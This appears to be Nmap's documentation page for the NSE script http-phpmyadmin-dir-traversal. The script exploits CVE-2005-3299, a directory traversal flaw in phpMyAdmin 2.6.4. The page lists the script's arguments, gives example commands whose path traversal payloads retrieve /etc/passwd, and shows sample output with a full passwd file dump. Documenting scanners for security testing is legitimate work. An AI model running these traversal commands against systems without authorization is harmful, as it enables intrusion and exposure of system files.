Home page logo
Zenmap screenshot
Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
Example Nmap output

File http-phpmyadmin-dir-traversal

Script types: portrule
Categories: vuln, exploit
Download: https://svn.nmap.org/nmap/scripts/http-phpmyadmin-dir-traversal.nse

User Summary

Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.


Script Arguments


Basepath to the services page. Default: /phpMyAdmin-2.6.4-pl1/


Remote file to retrieve. Default: ../../../../../etc/passwd


Output file


See the documentation for the slaxml library.

http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent

See the documentation for the http library.

smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername

See the documentation for the smbauth library.

vulns.short, vulns.showall

See the documentation for the vulns library.

Example Usage

nmap -p80 --script http-phpmyadmin-dir-traversal --script-args="dir='/pma/',file='../../../../../../../../etc/passwd',outfile='passwd.txt'" <host/ip>
nmap -p80 --script http-phpmyadmin-dir-traversal <host/ip>

Script Output

80/tcp open  http
| http-phpmyadmin-dir-traversal:
|   phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2005-3299
|     Description:
|       PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|     Disclosure date: 2005-10-nil
|     Extra information:
|       ../../../../../../../../etc/passwd :
|   root:x:0:0:root:/root:/bin/bash
|   daemon:x:1:1:daemon:/usr/sbin:/bin/sh
|   bin:x:2:2:bin:/bin:/bin/sh
|   sys:x:3:3:sys:/dev:/bin/sh
|   sync:x:4:65534:sync:/bin:/bin/sync
|   games:x:5:60:games:/usr/games:/bin/sh
|   man:x:6:12:man:/var/cache/man:/bin/sh
|   lp:x:7:7:lp:/var/spool/lpd:/bin/sh
|   mail:x:8:8:mail:/var/mail:/bin/sh
|   news:x:9:9:news:/var/spool/news:/bin/sh
|   uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
|   proxy:x:13:13:proxy:/bin:/bin/sh
|   www-data:x:33:33:www-data:/var/www:/bin/sh
|   backup:x:34:34:backup:/var/backups:/bin/sh
|   list:x:38:38:Mailing List Manager:/var/list:/bin/sh
|   irc:x:39:39:ircd:/var/run/ircd:/bin/sh
|   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
|   nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
|   libuuid:x:100:101::/var/lib/libuuid:/bin/sh
|   syslog:x:101:103::/home/syslog:/bin/false
|   sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
|   dps:x:1000:1000:dps,,,:/home/dps:/bin/bash
|   vboxadd:x:999:1::/var/run/vboxadd:/bin/false
|   mysql:x:103:110:MySQL Server,,,:/nonexistent:/bin/false
|   memcache:x:104:112:Memcached,,,:/nonexistent:/bin/false
|   ../../../../../../../../etc/passwd saved to passwd.txt
|     References:
|       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3299
|_      http://www.exploit-db.com/exploits/1244/



  • Alexey Meshcheryakov

License: Same as Nmap--See https://nmap.org/book/man-legal.html

Nmap Site Navigation

Intro Reference Guide Book Install Guide
Download Changelog Zenmap GUI Docs
Bug Reports OS Detection Propaganda Related Projects
In the Movies In the News
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]